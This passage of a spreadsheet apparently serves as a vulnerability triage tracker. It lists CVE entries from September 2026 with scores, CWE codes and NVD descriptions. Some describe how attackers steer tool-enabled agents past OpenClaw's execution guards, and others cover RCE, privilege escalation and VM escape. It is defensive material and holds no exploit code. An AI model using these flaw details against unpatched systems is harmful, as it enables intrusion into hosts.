          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 improperly handles case sensitivity in the model-facing cron tool: a mixed-case payload kind can pass the agent-facing shell-execution guard and later normalize into a command job. An actor able to steer a tool-enabled agent can therefore create a persistent cron job that executes attacker-selected commands with the privileges of the OpenClaw process user, resulting in access to host files and credentials and impact to scheduled service availability. The issue is limited to cron jobs created or edited through the model-facing cron tool; direct CLI and authorized Gateway scheduling surfaces are trusted operator controls. Fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100580</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100586</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Codex before 2026.7.1 fails to properly enforce owner authorization when creating native conversation bindings. Non-owner channel senders with command access can create bindings to the native Codex runtime and execute host-capable turns with access to files, tools, and processes.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100586</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100587</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly validate owner authorization in the Codex computer-use installation command. Non-owner channel senders can install arbitrary plugins and execute MCP processes with OpenClaw user privileges, affecting host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100587</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100596</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 fail to properly authorize non-owner users executing MCP configuration changes through /mcp set and /mcp unset commands. Attackers can persist arbitrary stdio MCP commands that execute with OpenClaw process privileges when configuration loads, compromising host confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100596</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100599</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions 2026.5.1 through 2026.7.0 fail to apply the configured exec approval path to Google Meet node commands. The googlemeet.chrome command accepts caller-supplied audio command arrays and executes them on a paired node without going through the normal system.run approval flow. In deployments with the Google Meet plugin enabled, a paired Chrome node, and the googlemeet.chrome node command allowed, a tool-enabled agent able to invoke that command can execute attacker-selected processes on the paired node, impacting files, credentials, browser profiles, and availability on that node. The issue is fixed in 2026.7.1; as a workaround, remove googlemeet.chrome from allowed node commands or disable the Google Meet plugin.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100599</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19804</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls &amp; Member Access Subscriptions plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 260814 via the 'first_name' parameter parameter. This is due to insufficient sanitization of the first_name parameter via esc_refs(), which strips only regex backreferences and not PHP tags, before substitution into the eval'd Signup Tracking Codes template, combined with disclosure of the site-global proxy verification key that allows PayPal postback verification to be bypassed. This makes it possible for unauthenticated attackers to execute code on the server. Successful exploitation requires that the site administrator has configured a Signup Tracking Codes template containing the %%first_name%% placeholder (a documented, GUI-supported feature) and that the attacker has obtained the site-global proxy verification key, which is exposed in plaintext in the JSON response of any PayPal Checkout AJAX request on the target site.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19804</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61525</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.2 and 7.1.0, zammad's session management for websocket and long-polling connections is susceptible to a path traversal attack. Session identifiers supplied by the client are insufficiently validated before being used to construct internal file paths. When the file-based session store is active (the default configuration), an authenticated attacker can manipulate the session identifier to reference locations outside the intended storage directory, leading to the deletion of arbitrary files and directories on the server. Exploitation requires only a low-privilege authenticated session and a single crafted request. Instances configured to use the Redis-based session store are not affected. This issue is fixed in versions 7.0.3 and 7.1.1.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61525</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62062</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Elementor Website Builder allows Cross Site Request Forgery.
This issue affects Elementor Website Builder: from n/a through 4.3.1.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62062</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85542</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is affected by a command injection vulnerability in the GIM bundle import functionality. An authenticated attacker can provide a crafted GIM bundle that causes attacker-controlled arguments to be passed to the tar command, resulting in arbitrary command execution with elevated privileges on the Central Manager.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85542</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89426</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>The Knit Pay – Cashfree, Instamojo, Razorpay, PayPal and more plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 9.6.1.0. This is due to the `maybe_update_user_role()` function reading the target role directly from an attacker-controlled Gravity Forms entry field — configured via the feed's `user_role_field_id` — and passing it to `WP_User::set_role()` without validating the supplied value against an allowlist of permitted roles. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to administrator by tampering with the hidden role field value at form submission time. Exploitation is further enabled by the fact that $0 orders are synchronously marked as SUCCESS during form submission without requiring a real payment, and when no GF User Registration user can be resolved, the role assignment target falls back to `$lead['created_by']` — the currently authenticated submitter's own user ID — making any authenticated form submitter an eligible exploitation target.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89426</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93834</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability was found in QEMU's 9pfs subsystem. A race condition between the main thread and a worker thread when processing concurrent Tlcreate and Twalk requests allows a malicious guest user to craft a fid path containing stale heap data, bypassing directory traversal restrictions and escaping the shared directory boundary. This can lead to arbitrary host file read/write and code execution (VM escape) as the QEMU process user.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93834</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94445</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go, golang, rust</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A malicious txtar could escape the intended execution context and force arbitrary writes to the playground host's trusted filesystem.
Disjointly, one of the three possible paths to invoke go vet on the playground host did not correctly restrict the execution environment. This permitted a Go process to make a read for an environment configuration file rooted in the playground host's $HOME.
Together, a well-crafted go env file and the go vet invocation could lead to remote code execution in the playground host itself.
This does not affect users of go.dev/play directly; however, it may affect independent deployments of golang.org/x/playground.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94445</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96795</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>docker, python</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, HorillaListView.export_data in horilla_views/generic/cbv/views.py accepts an authenticated user's columns POST parameter, takes field_tuple[1], interpolates it into dynamic_fn_str as Python source, and passes the generated function definition to exec(). A crafted string that remains valid under ast.literal_eval can inject Python syntax into a default argument evaluated during function definition, allowing arbitrary operating-system commands to execute with the application process privileges, including root privileges in the shipped Docker image. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96795</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96812</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-668</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Improper Exposure of Resource to Wrong Sphere in the host file helper (gofer) in Google gVisor prior to commit 573a9e73cf844f on Linux platforms with CUSE enabled allows a local attacker with container image deployment privileges to achieve root code execution on the host system. By including a /dev/cuse character device node in a container image, opening the device passes through to the host, allowing the sandboxed attacker to register a host device and exploit CUSE unrestricted ioctl handling to overwrite root udev helper memory.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96812</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97527</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr"/>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Serialize NVMe unsol ctx list with a per-fcport lock
The fcport-&gt;unsol_ctx_head list is modified from several contexts without
a common lock. Entries are added in qla2xxx_process_purls_iocb() from the
response queue ISR (under the qpair qp_lock), while they are removed from
qla2xxx_process_purls_pkt() (DPC/purex worker), qla_nvme_xmt_ls_rsp()
(NVMe-FC transport callback) and qla_nvme_release_lsrsp_cmd_kref() (SRB
completion). The qpair qp_lock cannot serialize this per-fcport list since
multiqueue adapters add entries through different qpairs, so a concurrent
add and delete (or two concurrent deletes) can corrupt the list pointers.
Introduce a dedicated per-fcport spinlock, unsol_ctx_lock, initialized in
qla2x00_alloc_fcport(), and take it around every list_add_tail()/list_del()
on unsol_ctx_head. The add nests under the existing qp_lock; no delete path
takes qp_lock, so the lock order is consistent and deadlock free.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97527</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97528</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
